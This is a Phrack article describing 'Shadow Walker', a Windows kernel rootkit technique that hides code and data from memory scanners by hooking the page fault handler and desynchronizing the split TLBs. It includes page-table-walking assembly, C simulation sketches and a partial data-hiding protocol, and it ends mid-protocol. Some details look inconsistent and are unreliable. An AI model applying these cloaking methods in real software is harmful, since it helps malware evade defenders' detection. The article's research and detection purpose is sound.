                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3d, Phile #0x08 of 0x14

|=-------------------------=[ Shadow Walker ]=---------------------------=|
|=--------=[ Raising The Bar For Windows Rootkit Detection ]=------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ Sherri Sparks ]=---------=|
|=---------=[ Jamie Butler ]=---------=|

0 - Introduction & Background On Rootkit Technology
  0.1 - Motivations

1 - Rootkit Detection
  1.1 - Detecting The Effect Of A Rootkit (Heuristics)
  1.2 - Detecting The Rootkit Itself (Signatures)

2 - Memory Architecture Review
  2.1 - Virtual Memory - Paging vs. Segmentation
  2.2 - Page Tables & PTE's
  2.3 - Virtual to Physical Address Translation
  2.4 - The Role of the Page Fault Handler
  2.5 - The Paging Performance Problem & the TLB

3 - Memory Cloaking Concept
  3.1 - Hiding Executable Code
  3.2 - Hiding Pure Data
  3.3 - Related Work
  3.4 - Proof of Concept Implementation
     3.4.a - Modified FU Rootkit
     3.4.b - Shadow Walker Memory Hook Engine

4 - Known Limitations & Performance Impact

5 - Detection

6 - Conclusion

7 - References

8 - Acknowledgements

--[ 0 - Introduction & Background

Rootkits have historically demonstrated a co-evolutionary adaptation and response to the development of defensive technologies designed to apprehend their subversive agenda. If we trace the evolution of rootkit technology, this pattern is evident. First generation rootkits were primitive. They simply replaced or modified key system files on the victim's system. The UNIX login program was a common target: an attacker would replace the original binary with a maliciously enhanced version that logged user passwords. Because these early rootkit modifications were limited to system files on disk, they motivated the development of file system integrity checkers such as Tripwire [1]. In response, rootkit developers moved their modifications off disk to the memory images of the loaded programs and, again, evaded detection.
These 'second' generation rootkits were primarily based upon hooking techniques that altered the execution path by making memory patches to loaded applications and some operating system components such as the system call table. Although much stealthier, such modifications remained detectable by searching for heuristic abnormalities. For example, it is suspicious for the system service table to contain pointers that do not point to the operating system kernel. This is the technique used by VICE [2]. Third generation kernel rootkit techniques like Direct Kernel Object Manipulation (DKOM), which was implemented in the FU rootkit [3], capitalize on the weaknesses of current detection software by modifying dynamically changing kernel data structures for which it is impossible to establish a static trusted baseline. ----[ 0.1 - Motivations There are public rootkits which illustrate all of these various techniques, but even the most sophisticated Windows kernel rootkits, like FU, possess an inherent flaw. They subvert essentially all of the operating system's subsystems with one exception: memory management. Kernel rootkits can control the execution path of kernel code, alter kernel data, and fake system call return values, but they have not (yet) demonstrated the capability to 'hook' or fake the contents of memory seen by other running applications. In other words, public kernel rootkits are sitting ducks for in memory signature scans. Only now are security companies beginning to think of implementing memory signature scans. Hiding from memory scans is similar to the problem faced by early viruses attempting to hide on the file system. Virus writers reacted to anti-virus programs scanning the file system by developing polymorphic and metamorphic techniques to evade detection. Polymorphism attempts to alter the binary image of a virus by replacing blocks of code with functionally equivalent blocks that appear different (i.e. 
use different opcodes to perform the same task). Polymorphic code, therefore, alters the superficial appearance of a block of code, but it does not fundamentally alter a scanner's view of that region of system memory.

Traditionally, there have been three general approaches to malicious code detection: misuse detection, which relies upon known code signatures; anomaly detection, which relies upon heuristics and statistical deviations from 'normal' behavior; and integrity checking, which relies upon comparing current snapshots of the file system or memory with a known, trusted baseline. A polymorphic rootkit (or virus) effectively evades signature-based detection of its code body, but falls short in anomaly or integrity detection schemes because it cannot easily camouflage the changes it makes to existing binary code in other system components.

Now imagine a rootkit that makes no effort to change its superficial appearance, yet is capable of fundamentally altering a detector's view of an arbitrary region of memory. When the detector attempts to read any region of memory modified by the rootkit, it sees a 'normal', unaltered view of memory. Only the rootkit sees the true, altered view of memory. Such a rootkit is clearly capable of compromising all of the primary detection methodologies to varying degrees.

The implications for misuse detection are obvious. A scanner attempts to read the memory for the loaded rootkit driver looking for a code signature, and the rootkit simply returns a random, 'fake' view of memory (i.e. one which does not include its own code) to the scanner. There are also implications for integrity validation approaches to detection. In these cases, the rootkit returns the unaltered view of memory to all processes other than itself. The integrity checker sees the unaltered code, finds a matching CRC or hash, and (erroneously) assumes that all is well.
Finally, any anomaly detection methods which rely upon identifying deviant structural characteristics will be fooled since they will receive a 'normal' view of the code. An example of this might be a scanner like VICE which attempts to heuristically identify inline function hooks by the presence of a direct jump at the beginning of the function body. Current rootkits, with the exception of Hacker Defender [4], have made little or no effort to introduce viral polymorphism techniques. As stated previously, while a valuable technique, polymorphism is not a comprehensive solution to the problem for a rootkit because the rootkit cannot easily camouflage the changes it must make to existing code in order to install its hooks. Our objective, therefore, is to show proof of concept that the current architecture permits subversion of memory management such that a non polymorphic kernel mode rootkit (or virus) is capable of controlling the view of memory regions seen by the operating system and other processes with a minimal performance hit. The end result is that it is possible to hide a 'known' public rootkit driver (for which a code signature exists) from detection. To this end, we have designed an 'enhanced' version of the FU rootkit. In section 1, we discuss the basic techniques used to detect a rootkit. In section 2, we give a background summary of the x86 memory architecture. Section 3 outlines the concept of memory cloaking and proof of concept implementation for our enhanced rootkit. Finally, we conclude with a discussion of its detectability, limitations, future extensibility, and performance impact. Without further ado, we bid you welcome to 4th generation rootkit technology. --[ 1 - Rootkit Detection Until several months ago, rootkit detection was largely ignored by security vendors. Many mistakenly classified rootkits in the same category as other viruses and malware. 
Because of this, security companies continued to use the same detection methods, the most prominent one being signature scans on the file system. This is only partially effective. Once a rootkit is loaded in memory, it can delete itself from disk, hide its files, or even divert an attempt to open the rootkit file. In this section, we will examine more recent advances in rootkit detection.

----[ 1.1 - Detecting The Effect Of A Rootkit (Heuristics)

One method to detect the presence of a rootkit is to detect how it alters other parameters on the computer system. In this way, the effects of the rootkit are seen although the actual rootkit that caused the deviation may not be known. This solution is a more general approach since no signature for a particular rootkit is necessary. This technique also looks for the rootkit in memory rather than on the file system.

One effect of a rootkit is that it usually alters the execution path of a normal program. By inserting itself in the middle of a program's execution, the rootkit can act as a middle man between the kernel functions the program relies upon and the program. With this position of power, the rootkit can alter what the program sees and does. For example, the rootkit could return a handle to a log file that is different from the one the program intended to open, or the rootkit could change the destination of network communication. These rootkit patches or hooks cause extra instructions to be executed. When a patched function is compared to a normal function, the difference in the number of instructions executed can be indicative of a rootkit. This is the technique used by PatchFinder [5]. One of the drawbacks of PatchFinder is that the CPU must be put into single step mode in order to count instructions. So for every instruction executed an interrupt is fired and must be handled. This slows the performance of the system, which may be unacceptable on a production machine.
Also, the actual number of instructions executed can vary even on a clean system.

Another rootkit detection tool called VICE detects the presence of hooks in applications and in the kernel. VICE analyzes the addresses of the functions exported by the operating system looking for hooks. The exported functions are typically the target of rootkits because by filtering certain APIs rootkits can hide. By finding the hooks themselves, VICE avoids the problems associated with instruction counting. However, VICE also relies upon several APIs, so it is possible for a rootkit to defeat its hook detection [6]. Currently the biggest weakness of VICE is that it detects all hooks, both malicious and benign. Hooking is a legitimate technique used by many security products.

Another approach to detecting the effects of a rootkit is to identify the operating system lying. The operating system exposes a well-known API in order for applications to interact with it. When the rootkit alters the results of a particular API, it is a lie. For example, Windows Explorer may request the number of files in a directory using several functions in the Win32 API. If the rootkit changes the number of files that the application can see, it is a lie. To detect the lie, a rootkit detector needs at least two ways to obtain the same information. Then, both results can be compared. RootkitRevealer [7] uses this technique. It calls the highest level APIs and compares those results with the results of the lowest level APIs. This method can be bypassed by a rootkit if it also hooks at those lowest layers. RootkitRevealer also does not address data alterations. The FU rootkit alters the kernel data structures in order to hide its processes. RootkitRevealer does not detect this because both the higher and lower layer APIs return the same altered data set.

Blacklight from F-Secure [8] also tries to detect deviations from the truth. To detect hidden processes, it relies on an undocumented kernel structure.
Just as FU walks the linked list of processes to hide, Blacklight walks a linked list of handle tables in the kernel. Every process has a handle table; therefore, by identifying all the handle tables Blacklight can find a pointer to every process on the computer. FU has been updated to also unhook the hidden process from the linked list of handle tables. This arms race will continue.

----[ 1.2 - Detecting the Rootkit Itself (Signatures)

Anti-virus companies have shown that scanning file systems for signatures can be effective; however, it can be subverted. If the attacker camouflages the binary by using a packing routine, the signature may no longer match the rootkit. A signature of the rootkit as it will execute in memory is one way to solve this problem. Some host based intrusion prevention systems (HIPS) try to prevent the rootkit from loading. However, it is extremely difficult to block all the ways code can be loaded in the kernel. Recent papers by Barnaby Jack [9] and Chong [10] have highlighted the threat of kernel exploits, which will allow arbitrary code to be loaded into memory and executed.

Although file system scans and loading detection are needed, perhaps the last layer of detection is scanning memory itself. This provides an added layer of security if the rootkit has bypassed the previous checks. Memory signatures are more reliable because the rootkit must unpack or decrypt itself in order to execute. Not only can scanning memory be used to find a rootkit, it can be used to verify the integrity of the kernel itself since it has a known signature. Scanning kernel memory is also much faster than scanning everything on disk. Arbaugh et al. [11] have taken this technique to the next level by implementing the scanner on a separate card with its own CPU.

The next section will explain the memory architecture on Intel x86.
--[ 2 - Memory Architecture Review

In early computing history, programmers were constrained by the amount of physical memory contained in a system. If a program was too large to fit into memory, it was the programmer's responsibility to divide the program into pieces that could be loaded and unloaded on demand. These pieces were called overlays. Forcing this type of memory management upon user level programmers increased code complexity and programming errors while reducing efficiency. Virtual memory was invented to relieve programmers of these burdens.

----[ 2.1 - Virtual Memory - Paging vs. Segmentation

Virtual memory is based upon the separation of the virtual and physical address spaces. The size of the virtual address space is primarily a function of the width of the address bus whereas the size of the physical address space is dependent upon the quantity of RAM installed in the system. Thus, a system possessing a 32 bit bus is capable of addressing 2^32 bytes (4 GB) of contiguous memory. It may, however, not have anywhere near that quantity of RAM installed. If this is the case, then the virtual address space will be larger than the physical address space.

Virtual memory divides both the virtual and physical address spaces into blocks. If these blocks are all the same size, the system is said to use a paging memory model. If the blocks are of varying sizes, it is considered to be a segmentation model. The x86 architecture is in fact a hybrid, utilizing both segmentation and paging; however, this article focuses primarily upon exploitation of its paging mechanism.

Under a paging model, blocks of virtual memory are referred to as pages and blocks of physical memory are referred to as frames. Each virtual page maps to a designated physical frame. This is what enables the virtual address space seen by programs to be larger than the amount of physically addressable memory (i.e. there may be more pages than physical frames).
It also means that virtually contiguous pages do not have to be physically contiguous. These points are illustrated by Figure 1.

    VIRTUAL ADDRESS                     PHYSICAL ADDRESS
         SPACE                                SPACE
    /-------------\                      /-------------\
    |             |                      |             |
    |   PAGE 01   |---\   /----------->>>|  FRAME 01   |
    |             |   |   |              |             |
    ---------------   |   |              ---------------
    |             |   |   |              |             |
    |   PAGE 02   |------------------->>>|  FRAME 02   |
    |             |   |   |              |             |
    ---------------   |   |              ---------------
    |             |   |   |              |             |
    |   PAGE 03   |   \---|----------->>>|  FRAME 03   |
    |             |       |              |             |
    ---------------       |              \-------------/
    |             |       |
    |   PAGE 04   |       |
    |             |       |
    |-------------|       |
    |             |       |
    |   PAGE 05   |-------/
    |             |
    \-------------/

[ Figure 1 - Virtual To Physical Memory Mapping (Paging)        ]
[                                                               ]
[ NOTE: 1. Virtual & physical address spaces are divided into   ]
[ fixed size blocks. 2. The virtual address space may be larger ]
[ than the physical address space. 3. Virtually contiguous      ]
[ blocks do not have to be mapped to physically contiguous      ]
[ frames.                                                       ]

----[ 2.2 - Page Tables & PTE's

The mapping information that connects a virtual address with its physical frame is stored in page tables in structures known as PTE's. PTE's also store status information. Status bits may indicate, for example, whether or not a page is valid (physically present in memory versus stored on disk), if it is writable, or if it is a user / supervisor page. Figure 2 shows the format for an x86 PTE.
Valid <------------------------------------------------------------\
Read/Write <---------------------------------------------------\   |
Privilege <------------------------------------------------\   |   |
Write Through <---------------------------------------\    |   |   |
Cache Disabled <---------------------------------\    |    |   |   |
Accessed <-----------------------------------\   |    |    |   |   |
Dirty <----------------------------------\   |   |    |    |   |   |
Reserved <---------------------------\   |   |   |    |    |   |   |
Global <------------------------\    |   |   |   |    |    |   |   |
Reserved <-----------------\    |    |   |   |   |    |    |   |   |
Reserved <-------------\   |    |    |   |   |   |    |    |   |   |
Reserved <---------\   |   |    |    |   |   |   |    |    |   |   |
                   |   |   |    |    |   |   |   |    |    |   |   |
+----------------+---+---+----+----+---+---+---+----+----+---+---+---+
|                |   |   |    |    |   |   |   |    |    | U | R |   |
|  PAGE FRAME #  | U | P | Cw | Gl | L | D | A | Cd | Wt | / | / | V |
|                |   |   |    |    |   |   |   |    |    | S | W |   |
+----------------+---+---+----+----+---+---+---+----+----+---+---+---+

[ Figure 2 - x86 PTE FORMAT (4 KBYTE PAGE) ]

----[ 2.3 - Virtual To Physical Address Translation

Virtual addresses encode the information necessary to find their PTE's in the page table. They are divided into 2 basic parts: the virtual page number and the byte index. The virtual page number provides the index into the page table while the byte index provides an offset into the physical frame. When a memory reference occurs, the PTE for the page is looked up in the page table by adding the page table base address to (virtual page number * PTE size). The base address of the page in physical memory is then extracted from the PTE and combined with the byte offset to define the physical memory address that is sent to the memory unit.

If the virtual address space is particularly large and the page size relatively small, it stands to reason that it will require a large page table to hold all of the mapping information. And as the page table must remain resident in main memory, a large table can be costly. One solution to this dilemma is to use a multi-level paging scheme.
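The single level lookup described above can be sketched in C. This is a minimal user mode simulation under stated assumptions, not kernel code: the flat table, the type name pte_t and the function translate_single_level are hypothetical names chosen for illustration, and only the valid bit (bit 0) and the frame bits (the upper 20 bits of a 4 KB page PTE) are modeled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SHIFT   12u                   /* 4 KB pages                  */
#define PAGE_SIZE    (1u << PAGE_SHIFT)
#define OFFSET_MASK  (PAGE_SIZE - 1u)      /* low 12 bits: byte index     */
#define PTE_VALID    0x1u                  /* bit 0 of the PTE            */

/* Hypothetical flat (single level) page table entry: one 32 bit PTE
 * per virtual page. */
typedef uint32_t pte_t;

/* Translates vaddr through a flat table of 'entries' PTEs.
 * Returns 1 and stores the physical address in *paddr on success,
 * or 0 if the page is unmapped or not valid (a page fault on real
 * hardware). */
static int translate_single_level(const pte_t *table, size_t entries,
                                  uint32_t vaddr, uint32_t *paddr)
{
    assert(table != NULL && paddr != NULL);

    uint32_t vpn    = vaddr >> PAGE_SHIFT;   /* virtual page number */
    uint32_t offset = vaddr & OFFSET_MASK;   /* byte index          */

    if (vpn >= entries)
        return 0;

    /* Indexing the array is base address + vpn * sizeof(PTE). */
    pte_t pte = table[vpn];
    if (!(pte & PTE_VALID))
        return 0;

    /* Frame base address (upper 20 bits) combined with the byte index. */
    *paddr = (pte & ~OFFSET_MASK) | offset;
    return 1;
}
```

Under this model, a flat table covering a 32 bit address space with 4 KB pages needs 2^20 entries, or 4 MB at 4 bytes per PTE, which is the cost that motivates a multi-level scheme.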
A two-level paging scheme, in effect, pages the page table. It further subdivides the virtual page number into a page directory index and a page table index. The page directory is simply a table of pointers to page tables. This two level paging scheme is the one supported by the x86. Figure 3 illustrates how the virtual address is divided up to index the page directory and page tables and Figure 4 illustrates the process of address translation.

+---------------------------------------+
| 31                                 12 |                0
| +----------------+ +----------------+ | +---------------+
| | PAGE DIRECTORY | |   PAGE TABLE   | | |  BYTE INDEX   |
| |     INDEX      | |     INDEX      | | |               |
| +----------------+ +----------------+ | +---------------+
|      10 bits             10 bits      |      12 bits
|                                       |
|          VIRTUAL PAGE NUMBER          |
+---------------------------------------+

[ Figure 3 - x86 Address & Page Table Indexing Scheme ]

[ Figure 4 - x86 Address Translation                               ]
[                                                                  ]
[ NOTE: CR3 (also stored in the KPROCESS block) holds the physical ]
[ address of the page directory (1 per process). The page          ]
[ directory index selects the PDN that locates a page table (512   ]
[ per process). The page table index selects the PFN of the page   ]
[ frame, and the byte index selects the byte within that frame.    ]

A memory access under a 2 level paging scheme potentially involves the following sequence of steps.

1. Lookup of page directory entry (PDE).
   Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page Directory Index (extracted from virtual address that caused the memory access)

   NOTE: Windows maps the page directory to virtual address 0xC0300000. Base addresses for page directories are also located in KPROCESS blocks and the register cr3 contains the physical address of the current page directory.

2. Lookup of page table entry.

   Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table Index (extracted from virtual address that caused the memory access).

   NOTE: Windows maps the page tables to virtual address 0xC0000000. The base physical address for the page table is also stored in the page directory entry.

3. Lookup of physical address.

   Physical Address = Frame Base Address (from PTE) + Byte Index

   NOTE: PTEs hold the physical address for the physical frame. This is combined with the byte index (offset into the frame) to form the complete physical address.

For those who prefer code to explanation, the following two routines show how this translation occurs. The first routine, GetPteAddress, performs steps 1 and 2 described above. It returns a pointer to the page table entry for a given virtual address. The second routine returns the physical frame number of the frame to which the page is mapped (i.e. the base physical address of the frame shifted right by 12 bits).

#define PROCESS_PAGE_DIR_BASE                  0xC0300000
#define PROCESS_PAGE_TABLE_BASE                0xC0000000
typedef unsigned long* PPTE;

/**************************************************************************
* GetPteAddress - Returns a pointer to the page table entry corresponding
*                 to a given memory address.
*
* Parameters:
*       PVOID VirtualAddress - Address you wish to acquire a pointer to the
*                              page table entry for.
*
* Return - Pointer to the page table entry for VirtualAddress or an error
*          code.
*
* Error Codes:
*       ERROR_PTE_NOT_PRESENT - The page table for the given virtual
*                               address is not present in memory.
*       ERROR_PAGE_NOT_PRESENT - The page containing the data for the
*                                given virtual address is not present in
*                                memory.
*
* NOTE: As listed here, the routine performs no presence checks of its
*       own and always returns a pointer.
**************************************************************************/
PPTE GetPteAddress( PVOID VirtualAddress )
{
        PPTE pPTE = 0;

        __asm
        {
                cli                     //disable interrupts
                pushad
                mov esi, PROCESS_PAGE_DIR_BASE
                mov edx, VirtualAddress
                mov eax, edx
                shr eax, 22             //upper 10 bits = page dir index
                lea eax, [esi + eax*4]  //pointer to page directory entry
                test dword ptr [eax], 0x80 //is it a large page?
                jnz Is_Large_Page       //it's a large page
                mov esi, PROCESS_PAGE_TABLE_BASE
                shr edx, 12             //upper 20 bits = virtual page number
                lea eax, [esi + edx*4]  //pointer to page table entry (PTE)
                mov pPTE, eax
                jmp Done

                //NOTE: There is not a page table for large pages because
                //the phys frames are contained in the page directory.
                Is_Large_Page:
                mov pPTE, eax

                Done:
                popad
                sti                     //reenable interrupts
        }//end asm

        return pPTE;

}//end GetPteAddress

/**************************************************************************
* GetPhysicalFrameAddress - Gets the physical frame in memory where the
*                           page is mapped. This corresponds to bits
*                           12 - 31 in the page table entry.
*
* Parameters -
*       PPTE pPte - Pointer to the PTE that you wish to retrieve the
*                   physical address from.
*
* Return - The physical frame number of the page (the base physical
*          address of the frame shifted right by 12 bits).
**************************************************************************/
ULONG GetPhysicalFrameAddress( PPTE pPte )
{
        ULONG Frame = 0;

        __asm
        {
                cli
                pushad
                mov eax, pPte
                mov ecx, [eax]
                shr ecx, 12  //physical page frame consists of the
                             //upper 20 bits
                mov Frame, ecx
                popad
                sti
        }//end asm

        return Frame;

}//end GetPhysicalFrameAddress

----[ 2.4 - The Role Of The Page Fault Handler

Since many processes only use a small portion of their virtual address space, only the used portions are mapped to physical frames. Also, because physical memory may be smaller than the virtual address space, the OS may move less recently used pages to disk (the pagefile) to satisfy current memory demands. Frame allocation is handled by the operating system.
If a process is larger than the available quantity of physical memory, or the operating system runs out of free physical frames, some of the currently allocated frames must be swapped to disk to make room. These swapped out pages are stored in the page file. The information about whether or not a page is resident in main memory is stored in the page table entry. When a memory access occurs, if the page is not present in main memory a page fault is generated. It is the job of the page fault handler to issue the I/O requests to swap out a less recently used page if all of the available physical frames are full and then to bring in the requested page from the pagefile.

When virtual memory is enabled, every memory access must be looked up in the page table to determine which physical frame it maps to and whether or not it is present in main memory. This incurs a substantial performance overhead, especially when the architecture is based upon a multi-level page table scheme like that of the Intel Pentium. The memory access page fault path can be summarized as follows.

1. Lookup in the page directory to determine if the page table for the address is present in main memory.
2. If not, an I/O request is issued to bring in the page table from disk.
3. Lookup in the page table to determine if the requested page is present in main memory.
4. If not, an I/O request is issued to bring in the page from disk.
5. Lookup the requested byte (offset) in the page.

Therefore every memory access, in the best case, actually requires 3 memory accesses: 1 to access the page directory, 1 to access the page table, and 1 to get the data at the correct offset. In the worst case, it may require an additional 2 disk I/Os (if the pages are swapped out to disk). Thus, virtual memory incurs a steep performance hit.

----[ 2.5 - The Paging Performance Problem & The TLB

The translation lookaside buffer (TLB) was introduced to help mitigate this problem.
Basically, the TLB is a hardware cache which holds frequently used virtual to physical mappings. Because the TLB is implemented using extremely fast associative memory, it can be searched for a translation much faster than it would take to look that translation up in the page tables. On a memory access, the TLB is first searched for a valid translation. If the translation is found, it is termed a TLB hit. Otherwise, it is a miss. A TLB hit, therefore, bypasses the slower page table lookup. Modern TLB's have an extremely high hit rate and therefore seldom incur the miss penalty of looking up the translation in the page table.

--[ 3 - Memory Cloaking Concept

One goal of an advanced rootkit is to hide its changes to executable code (i.e. the placement of an inline patch, for example). Obviously, it may also wish to hide its own code from view. Code, like data, sits in memory and we may define the basic forms of memory access as:

  - EXECUTE
  - READ
  - WRITE

Technically speaking, we know that each virtual page maps to a physical page frame defined by a certain number of bits in the page table entry. What if we could filter memory accesses such that EXECUTE accesses mapped to a different physical frame than READ / WRITE accesses? From a rootkit's perspective, this would be highly advantageous. Consider the case of an inline hook. The modified code would run normally, but any attempts to read (i.e. detect) changes to the code would be diverted to a 'virgin' physical frame that contained a view of the original, unaltered code. Similarly, a rootkit driver might hide itself by diverting READ accesses within its memory range off to a page containing random garbage or to a page containing a view of code from another 'innocent' driver. This would imply that it is possible to spoof both signature scanners and integrity monitors.
Indeed, an architectural feature of the Pentium architecture makes it possible for a rootkit to perform this little trick with a minimal impact on overall system performance. We describe the details in the next section.

----[ 3.1 - Hiding Executable Code

Ironically, the general methodology we are about to discuss is an offensive extension of an existing stack overflow protection scheme known as PaX. We briefly discuss the PaX implementation in 3.3 under related work.

In order to hide executable code, there are at least 3 underlying issues which must be addressed:

1. We need a way to filter execute and read / write accesses.
2. We need a way to "fake" the read / write memory accesses when we detect them.
3. We need to ensure that performance is not adversely affected.

The first issue concerns how to filter execute accesses from read / write accesses. When virtual memory is enabled, memory access restrictions are enforced by setting bits in the page table entry which specify whether a given page is read-only or read-write. Under the IA-32 architecture, however, all pages are executable. As such, there is no official way to filter execute accesses from read / write accesses and thus enforce the execute-only / diverted read-write semantics necessary for this scheme to work. We can, however, trap and filter memory accesses by marking their PTE's not present and hooking the page fault handler. In the page fault handler we have access to the saved instruction pointer and the faulting address. If the instruction pointer equals the faulting address, then it is an execute access. Otherwise, it is a read / write. As the OS uses the present bit in memory management, we also need to differentiate between page faults due to our memory hook and normal page faults. The simplest way is to require that all hooked pages either reside in non paged memory or be explicitly locked down via an API like MmProbeAndLockPages.
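The filtering decision described above can be sketched as a small, self-contained C routine. This is an illustrative model only, not the hook itself: fault_info, fault_action and filter_fault are hypothetical names, and the sketch assumes the hooked page is locked in memory so that any not present fault on it must come from the memory hook.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_MASK 0xFFFFF000u  /* upper 20 bits select a 4 KB page */

/* Hypothetical snapshot of what a page fault handler can observe. */
typedef struct {
    uint32_t saved_eip;      /* instruction pointer saved at fault time  */
    uint32_t fault_address;  /* faulting linear address (CR2 on the x86) */
} fault_info;

typedef enum {
    FAULT_PASS_TO_OS,        /* not on a hooked page: normal page fault  */
    FAULT_HOOKED_EXECUTE,    /* instruction fetch from the hooked page   */
    FAULT_HOOKED_READ_WRITE  /* data read / write to the hooked page     */
} fault_action;

/* Decides how a fault should be handled for a single hooked page. */
static fault_action filter_fault(const fault_info *f,
                                 uint32_t hooked_page_base)
{
    assert(f != NULL);

    /* Faults on any other page belong to the OS handler. */
    if ((f->fault_address & PAGE_MASK) != (hooked_page_base & PAGE_MASK))
        return FAULT_PASS_TO_OS;

    /* Saved instruction pointer == faulting address: execute access. */
    if (f->saved_eip == f->fault_address)
        return FAULT_HOOKED_EXECUTE;

    /* Otherwise some instruction elsewhere touched the page as data. */
    return FAULT_HOOKED_READ_WRITE;
}
```

A real handler would be entered from the interrupt descriptor table and would chain to the original handler for the FAULT_PASS_TO_OS case; those details are outside the scope of this sketch.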
The next issue concerns how to "fake" the EXECUTE and READ / WRITE accesses when we detect them (and do so with a minimal performance hit). In this case, the Pentium TLB architecture comes to the rescue. The Pentium possesses a split TLB with one TLB for instructions and the other for data. As mentioned previously, the TLB caches the virtual to physical page frame mappings when virtual memory is enabled. Normally, the ITLB and DTLB are synchronized and hold the same physical mapping for a given page. Though the TLB is primarily hardware controlled, there are several software mechanisms for manipulating it.

  - Reloading cr3 causes all TLB entries except global entries to be flushed. This typically occurs on a context switch.
  - The invlpg instruction causes a specific TLB entry to be flushed.
  - Executing a data access instruction causes the DTLB to be loaded with the mapping for the data page that was accessed.
  - Executing a call causes the ITLB to be loaded with the mapping for the page containing the code executed in response to the call.

We can filter execute accesses from read / write accesses and fake them by desynchronizing the TLB's such that the ITLB holds a different virtual to physical mapping than the DTLB. This process is performed as follows:

First, a new page fault handler is installed to handle the cloaked page accesses. Then the page-to-be-hooked is marked not present and its TLB entry is flushed via the invlpg instruction. This ensures that all subsequent accesses to the page will be filtered through the installed page fault handler. Within the installed page fault handler, we determine whether a given memory access is due to an execute or read / write by comparing the saved instruction pointer with the faulting address. If they match, the memory access is due to an execute. Otherwise, it is due to a read / write. The type of access determines which mapping is manually loaded into the ITLB or DTLB. Figure 5 provides a conceptual view of this strategy.
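To make the desynchronization concrete, the following C fragment simulates a split TLB for a single cloaked page. It is a toy model under loud assumptions: each TLB is reduced to one entry, the names cloak_sim, cloak_init and cloak_access are hypothetical, and "loading" a TLB is modeled as a simple assignment rather than the hardware behavior a real handler would have to provoke.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef enum { ACCESS_FETCH, ACCESS_DATA } access_kind;

/* One cached translation; 'valid' is cleared by a flush (invlpg). */
typedef struct {
    int      valid;
    uint32_t frame;
} tlb_entry;

/* Toy model of one cloaked page with a split TLB. */
typedef struct {
    tlb_entry itlb;        /* instruction TLB entry for the page     */
    tlb_entry dtlb;        /* data TLB entry for the page            */
    uint32_t  exec_frame;  /* frame holding the code that really runs */
    uint32_t  rw_frame;    /* frame shown to read / write accesses   */
    unsigned  faults;      /* page faults taken so far               */
} cloak_sim;

/* Models marking the page not present and flushing its TLB entry. */
static void cloak_init(cloak_sim *s, uint32_t exec_frame, uint32_t rw_frame)
{
    assert(s != NULL);
    s->itlb.valid = 0;
    s->dtlb.valid = 0;
    s->exec_frame = exec_frame;
    s->rw_frame   = rw_frame;
    s->faults     = 0;
}

/* Returns the frame an access of the given kind ends up using. */
static uint32_t cloak_access(cloak_sim *s, access_kind kind)
{
    assert(s != NULL);
    tlb_entry *tlb = (kind == ACCESS_FETCH) ? &s->itlb : &s->dtlb;

    if (!tlb->valid) {
        /* TLB miss on a not present page: the hooked fault handler
         * runs and loads only the TLB that matches the access type. */
        s->faults++;
        tlb->frame = (kind == ACCESS_FETCH) ? s->exec_frame : s->rw_frame;
        tlb->valid = 1;
    }
    return tlb->frame;     /* TLB hit: no fault, cached mapping used */
}
```

With the example values from Figure 5 (frame 1 for code, frame 6 for data), the first fetch and the first read each cost one fault, and later accesses of either kind hit their own TLB and see different frames without faulting again.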
Lastly, it is important to note that TLB access is much faster than
performing a page table lookup. In general, page faults are costly.
Therefore, at first glance, it might appear that marking the hidden pages
not present would incur a significant performance hit. This is, in fact,
not the case. Though we mark the hidden pages not present, for most memory
accesses we do not incur the penalty of a page fault because the entries
are cached in the TLB. The exceptions are, of course, the initial faults
that occur after marking the cloaked page not present and any subsequent
faults which result from TLB entries being evicted when a TLB set becomes
full. Thus, the primary job of the new page fault handler is to explicitly
and selectively load the DTLB or ITLB with the correct mappings for hidden
pages. All faults originating on other pages are passed down to the
operating system page fault handler.

                                                          +-------------+
                                            rootkit code  |   FRAME 1   |
   Is it a         +-----------+           /------------->|             |
   code            |           |           |              |-------------|
   access?         |   ITLB    |           |              |   FRAME 2   |
           /------>|-----------|-----------/              |             |
           |       |  VPN=12   |                          |-------------|
           |       |  Frame=1  |                          |   FRAME 3   |
           |       +-----------+                          |             |
           |                           +-------------+    |-------------|
   MEMORY                              | PAGE TABLES |    |   FRAME 4   |
   ACCESS                              +-------------+    |             |
   VPN=12                                                 |-------------|
           |                                              |   FRAME 5   |
           |       +-----------+                          |             |
           |       |           |                          |-------------|
           |       |   DTLB    |    random garbage        |   FRAME 6   |
           |------>|------------------------------------->|             |
   Is it a         |  VPN=12   |                          |-------------|
   data            |  Frame=6  |                          |   FRAME N   |
   access?         +-----------+                          |             |
                                                          +-------------+

   [ Figure 5 - Faking Read / Writes by Desynchronizing the Split TLB ]

----[ 3.2 - Hiding Pure Data

Hiding data modifications is significantly less optimal than hiding code
modifications, but it can be accomplished provided that one is willing to
accept the performance hit. We cause a minimal performance loss when hiding
executable code by virtue of the fact that the ITLB can maintain a
different mapping than the DTLB.
Code can execute very fast with a minimum of page faults because that
mapping is always present in the ITLB (except in the rare event the ITLB
entry gets evicted from the cache). Unfortunately, in the case of data we
can't introduce any such inconsistency. There is only 1 DTLB and
consequently that DTLB has to be kept empty if we are to catch and filter
specific data accesses. The end result is 1 page fault per data access.
This is not a big problem in terms of hiding a specific driver if the
driver is carefully designed and uses a minimum of global data, but the
performance hit could be formidable when trying to hide a frequently
accessed data page.

For data hiding, we have used a protocol based approach between the hidden
driver and the memory hook. We use this to show how one might hide global
data in a rootkit driver. In order to allow the memory access to go
through, the DTLB is loaded in the page fault handler. In order to enforce
the correct filtering of data accesses, however, it must be flushed
immediately by the requesting driver to ensure that no other code accesses
that memory address and receives the data resulting from an incorrect
mapping.

The protocol for accessing data on a hidden page is as follows:

  1. The driver raises the IRQL to DISPATCH_LEVEL (to ensure that no other
     code gets to run which might see the "hidden" data as opposed to the
     "fake" data).
  2. The driver must explicitly flush the TLB entry for the page containing
     the cloaked variable using the invlpg instruction, in case some other
     process has attempted to access our data page and been served with
     the fake frame (i.e. we don't want to receive the fake mapping which
     may still reside in the TLB so we clear it to be sure).
  3. The driver is allowed to perform the data access.
  4. The driver must explicitly flush the TLB entry for the page containing
     the cloaked variable using the invlpg instruction (i.e. so that the
     "real" mapping does not remain in the TLB.
